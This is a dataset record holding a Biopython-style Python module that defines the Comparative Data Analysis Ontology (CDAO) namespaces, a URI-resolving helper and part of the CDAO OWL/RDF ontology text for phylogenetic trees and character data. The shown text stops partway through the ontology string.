blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
79b3d0b1f31ae483e6c3cb111c968fcd908611f5 | 52e8841ac9603e994fc487ecb52f232e55a50e07 | /Bio/Phylo/_cdao_owl.py | 6b0c26255227e27d3e4481b469db461c72b8c109 | [] | no_license | rored/RozszerzenieBio.PDB | aff434fddfe57199a7465f79126eba62b1c789ae | 7c9d696faacabff912b1263fe19291d6a198c3c2 | refs/heads/master | 2021-01-21T04:50:37.903227 | 2016-06-23T19:15:42 | 2016-06-23T19:15:42 | 55,064,794 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 110,070 | py | # Copyright (C) 2013 by Ben Morris (ben@bendmorris.com)
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
import xml.etree.ElementTree as ET
__docformat__ = "restructuredtext en"
cdao_namespaces = {
'cdao': 'http://purl.obolibrary.org/obo/cdao.owl#',
'obo': 'http://purl.obolibrary.org/obo/',
}
def resolve_uri(s, namespaces=cdao_namespaces, cdao_to_obo=True, xml_style=False):
"""Converts prefixed URIs to full URIs.
Optionally, converts CDAO named identifiers to OBO numeric identifiers.
"""
if cdao_to_obo and s.startswith('cdao:'):
return resolve_uri('obo:%s' % cdao_elements[s[5:]], namespaces, cdao_to_obo)
for prefix in namespaces:
if xml_style:
s = s.replace(prefix + ':', '{%s}' % namespaces[prefix])
else:
s = s.replace(prefix + ':', namespaces[prefix])
return s
cdao_owl = '''<?xml version="1.0"?>
<!DOCTYPE rdf:RDF [
<!ENTITY owl "http://www.w3.org/2002/07/owl#" >
<!ENTITY obo "http://purl.obolibrary.org/obo/" >
<!ENTITY dc "http://purl.org/dc/elements/1.1/" >
<!ENTITY xsd "http://www.w3.org/2001/XMLSchema#" >
<!ENTITY rdfs "http://www.w3.org/2000/01/rdf-schema#" >
<!ENTITY rdf "http://www.w3.org/1999/02/22-rdf-syntax-ns#" >
]>
<rdf:RDF xmlns="http://www.evolutionaryontology.org/cdao/1.0/cdao.owl#"
xml:base="http://www.evolutionaryontology.org/cdao/1.0/cdao.owl"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:obo="http://purl.obolibrary.org/obo/"
xmlns:rdfs="http://www.w3.org/2000/01/rdf-schema#"
xmlns:owl="http://www.w3.org/2002/07/owl#"
xmlns:xsd="http://www.w3.org/2001/XMLSchema#"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<owl:Ontology rdf:about="&obo;cdao.owl">
<dc:coverage rdf:datatype="&xsd;string">Comparison of two or more biological entities of the same class when the similarities and differences of the entities are treated explicitly as the product of an evolutionary process of descent with modification.</dc:coverage>
<dc:description rdf:datatype="&xsd;string">The Comparative Data Analysis Ontology (CDAO) provides a framework for understanding data in the context of evolutionary-comparative analysis. This comparative approach is used commonly in bioinformatics and other areas of biology to draw inferences from a comparison of differently evolved versions of something, such as differently evolved versions of a protein. In this kind of analysis, the things-to-be-compared typically are classes called 'OTUs' (Operational Taxonomic Units). The OTUs can represent biological species, but also may be drawn from higher or lower in a biological hierarchy, anywhere from molecules to communities. The features to be compared among OTUs are rendered in an entity-attribute-value model sometimes referred to as the 'character-state data model'. For a given character, such as 'beak length', each OTU has a state, such as 'short' or 'long'. The differences between states are understood to emerge by a historical process of evolutionary transitions in state, represented by a model (or rules) of transitions along with a phylogenetic tree. CDAO provides the framework for representing OTUs, trees, transformations, and characters. The representation of characters and transformations may depend on imported ontologies for a specific type of character.</dc:description>
<dc:creator xml:lang="en">CDAO Team</dc:creator>
<dc:title xml:lang="en">Comparative Data Analysis Ontology</dc:title>
<dc:subject xml:lang="en">comparative analysis; comparative data analysis; evolutionary comparative analysis; evolution; phylogeny; phylogenetics</dc:subject>
<dc:rights rdf:resource="http://creativecommons.org/publicdomain/zero/1.0/"/>
<owl:versionIRI rdf:resource="&obo;cdao/2012-06-06/cdao.owl"/>
<owl:imports rdf:resource="&obo;iao/ontology-metadata.owl"/>
</owl:Ontology>
<!--
///////////////////////////////////////////////////////////////////////////////////////
//
// Annotation properties
//
///////////////////////////////////////////////////////////////////////////////////////
-->
<owl:AnnotationProperty rdf:about="&dc;creator"/>
<owl:AnnotationProperty rdf:about="&dc;subject"/>
<owl:AnnotationProperty rdf:about="&dc;description"/>
<owl:AnnotationProperty rdf:about="&dc;coverage"/>
<owl:AnnotationProperty rdf:about="&dc;language"/>
<owl:AnnotationProperty rdf:about="&dc;identifier"/>
<owl:AnnotationProperty rdf:about="&dc;date"/>
<owl:AnnotationProperty rdf:about="&dc;source"/>
<owl:AnnotationProperty rdf:about="&dc;title"/>
<owl:AnnotationProperty rdf:about="&dc;rights"/>
<!--
///////////////////////////////////////////////////////////////////////////////////////
//
// Object Properties
//
///////////////////////////////////////////////////////////////////////////////////////
-->
<!-- http://purl.obolibrary.org/obo/CDAO_0000142 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000142">
<rdfs:label rdf:datatype="&xsd;string">has_Character</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property associates a character data matrix with a character (a column) represented in the matrix.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000056"/>
<rdfs:range rdf:resource="&obo;CDAO_0000071"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000143 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000143">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Edge_as_Child</rdfs:label>
<dc:description>The property links a Node to the Edge it belongs to in the child position.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000139"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000146"/>
<owl:inverseOf rdf:resource="&obo;CDAO_0000209"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000144 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000144">
<rdf:type rdf:resource="&owl;TransitiveProperty"/>
<rdfs:label rdf:datatype="&xsd;string">has_Ancestor</rdfs:label>
<dc:description>The property links a node to any of the other nodes that are its ancestors in a rooted tree.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<owl:inverseOf rdf:resource="&obo;CDAO_0000174"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000145 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000145">
<rdfs:label rdf:datatype="&xsd;string">has_Nucleotide_State</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property associates a nucleotide character-state instance with a state value from the domain of nucleotide states.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000002"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000184"/>
<rdfs:range>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000015"/>
<rdf:Description rdf:about="&obo;CDAO_0000133"/>
</owl:unionOf>
</owl:Class>
</rdfs:range>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000146 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000146">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Edge</rdfs:label>
<dc:description>The property links a Node to one of the edges that are incident on such node.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000099"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000190"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000147 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000147">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Character_State_Data_Matrix</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000056"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000190"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000071"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000148 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000148">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">has_Root</rdfs:label>
<dc:description>The property links a rooted tree to the specific node that represents the unique root of the tree.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000012"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000149 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000149">
<rdfs:label rdf:datatype="&xsd;string">has_Child</rdfs:label>
<dc:description>The property links a node to a node that is an immediate descendant in the tree.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000174"/>
<owl:inverseOf rdf:resource="&obo;CDAO_0000179"/>
<owl:propertyChainAxiom rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000177"/>
<rdf:Description rdf:about="&obo;CDAO_0000209"/>
</owl:propertyChainAxiom>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000150 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000150">
<rdfs:label rdf:datatype="&xsd;string">has_First_Coordinate_Item</rdfs:label>
<dc:description rdf:datatype="&xsd;string">The property that relates a coordinate list to the first item in the list.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000092"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
<rdfs:range>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000003"/>
<rdf:Description rdf:about="&obo;CDAO_0000095"/>
</owl:unionOf>
</owl:Class>
</rdfs:range>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000151 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000151">
<rdfs:label rdf:datatype="&xsd;string">has_Coordinate</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000022"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000098"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000152 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000152">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Continuous_Character</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000019"/>
<rdfs:range rdf:resource="&obo;CDAO_0000068"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000205"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000153 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000153">
<rdfs:label rdf:datatype="&xsd;string">has_Datum</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a character to a state datum for the character.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000098"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000071"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000154 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000154">
<rdfs:label rdf:datatype="&xsd;string">has_Standard_Datum</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000008"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000183"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000075"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000155 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000155">
<rdfs:label rdf:datatype="&xsd;string">subtree_of</rdfs:label>
<dc:description>This property links two networks where the latter is a substructure of the former</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000006"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000006"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000156 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000156">
<rdfs:label rdf:datatype="&xsd;string">has_Amino_Acid_State</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property associates a amino acid character-state instance with a state value from the domain of amino acid states.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000112"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000184"/>
<rdfs:range>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000015"/>
<rdf:Description rdf:about="&obo;CDAO_0000076"/>
</owl:unionOf>
</owl:Class>
</rdfs:range>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000157 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000157">
<rdfs:label rdf:datatype="&xsd;string">is_annotation_of</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000040"/>
<rdfs:range rdf:resource="&owl;Thing"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000158 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000158">
<rdfs:label rdf:datatype="&xsd;string">has_RNA_Datum</rdfs:label>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000206"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000159 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000159">
<rdfs:label rdf:datatype="&xsd;string">has_Left_State</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a transformation to a 'left' state (the state associated with the 'left' node).</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000091"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000097"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000182"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000160 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000160">
<rdfs:label rdf:datatype="&xsd;string">precedes</rdfs:label>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000161 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000161">
<rdfs:label rdf:datatype="&xsd;string">exclude</rdfs:label>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000162 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000162">
<rdfs:label rdf:datatype="&xsd;string">has_Node</rdfs:label>
<dc:description>Property that associates to each Edge the Nodes it connects.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000099"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000163 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000163">
<rdfs:label rdf:datatype="&xsd;string">nca_node_of</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000059"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000164 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000164">
<rdfs:label rdf:datatype="&xsd;string">has_External_Reference</rdfs:label>
<rdfs:comment rdf:datatype="&rdfs;Literal">Associates a TU to some external taxonomy reference.</rdfs:comment>
<rdfs:domain rdf:resource="&obo;CDAO_0000138"/>
<rdfs:range rdf:resource="&owl;Thing"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000165 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000165">
<rdfs:label rdf:datatype="&xsd;string">has_Coordinate_System</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property links a coordinate to the coordinate system it references.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000022"/>
<rdfs:range rdf:resource="&obo;CDAO_0000104"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000166 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000166">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Nucleotide_Character</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000002"/>
<rdfs:range rdf:resource="&obo;CDAO_0000094"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000205"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000167 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000167">
<rdf:type rdf:resource="&owl;SymmetricProperty"/>
<rdfs:label rdf:datatype="&xsd;string">connects_to</rdfs:label>
<owl:inverseOf rdf:resource="&obo;CDAO_0000167"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000168 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000168">
<rdfs:label rdf:datatype="&xsd;string">has_Amino_Acid_Datum</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates an amino acid character (a column in a protein sequence alignment) to a state datum for the character (an individual cell in the alignment column).</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000112"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000206"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000131"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000169 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000169">
<rdfs:label rdf:datatype="&xsd;string">hereditary_change_of</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a type of evolutionary change (an Edge_Transformation) to the character that undergoes the change. The change is a transformation_of the affected character.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000071"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000170 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000170">
<rdfs:label rdf:datatype="&xsd;string">has_Compound_Datum</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a compound character (a character with some states that are subdividable) to a state datum for the character.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000136"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000183"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000078"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000171 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000171">
<rdfs:label rdf:datatype="&xsd;string">has_Descendants</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000059"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000080"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000172 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000172">
<rdfs:label rdf:datatype="&xsd;string">reconciliation_of</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000030"/>
<rdfs:range rdf:resource="&obo;CDAO_0000110"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000173 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000173">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Amino_Acid_Character</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000112"/>
<rdfs:range rdf:resource="&obo;CDAO_0000131"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000205"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000174 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000174">
<rdf:type rdf:resource="&owl;TransitiveProperty"/>
<rdfs:label rdf:datatype="&xsd;string">has_Descendant</rdfs:label>
<dc:description>A property that links a node to any of its descendants in a rooted tree.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000175 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000175">
<rdfs:label rdf:datatype="&xsd;string">has_Continuous_State</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property associates a character-state instance with a state value on a continuous numeric scale.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000019"/>
<rdfs:range rdf:resource="&obo;CDAO_0000031"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000184"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000176 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000176">
<rdfs:label rdf:datatype="&xsd;string">has_Type</rdfs:label>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000177 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000177">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Edge_as_Parent</rdfs:label>
<dc:description>The property links a Node to one of the Edges where the node appears in the parent position (i.e., closer to the root).</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000139"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000146"/>
<owl:inverseOf rdf:resource="&obo;CDAO_0000201"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000178 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000178">
<rdfs:label rdf:datatype="&xsd;string">has</rdfs:label>
<dc:description>Generic 'has' property.</dc:description>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000179 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000179">
<rdfs:label rdf:datatype="&xsd;string">has_Parent</rdfs:label>
<dc:description>The property that links a node to its unique parent in a rooted tree.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000144"/>
<owl:propertyChainAxiom rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000143"/>
<rdf:Description rdf:about="&obo;CDAO_0000201"/>
</owl:propertyChainAxiom>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000180 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000180">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Compound_Character</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000078"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000136"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000205"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000181 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000181">
<rdfs:label rdf:datatype="&xsd;string">homologous_to</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This propery relates different instances of the same character, including the case when the states of the character differ (e.g., large_beak of beak_size_character of TU A is homologous_to small_beak of beak_size_character of TU B).</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000098"/>
<rdfs:range rdf:resource="&obo;CDAO_0000098"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000182 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000182">
<rdfs:label rdf:datatype="&xsd;string">has_Change_Component</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a transformation to the components that compose it.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000097"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000183 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000183">
<rdfs:label rdf:datatype="&xsd;string">has_Categorical_Datum</rdfs:label>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000153"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000184 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000184">
<rdfs:label rdf:datatype="&xsd;string">has_State</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property associates a character-state instance with its state value, e.g., a state value expressed in terms of an imported domain ontology.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000091"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000098"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000185 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000185">
<rdfs:label rdf:datatype="&xsd;string">has_Left_Node</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a transformation to a 'left' node (the node that has the 'left' state).</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000097"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000182"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000186 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000186">
<rdfs:label rdf:datatype="&xsd;string">has_Right_State</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a transformation to a 'right' state (the state associated with the 'right' node).</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000091"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000097"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000182"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000187 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000187">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">represents_TU</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a TU or taxonomic unit (typically associated with character data) to a phylogenetic history (Tree).</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000138"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000188 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000188">
<rdfs:label rdf:datatype="&xsd;string">exclude_Node</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000161"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000189 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000189">
<rdfs:label rdf:datatype="&xsd;string">has_Compound_State</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property associates a compound character-state instance with its compound state value.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000136"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000184"/>
<rdfs:range>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
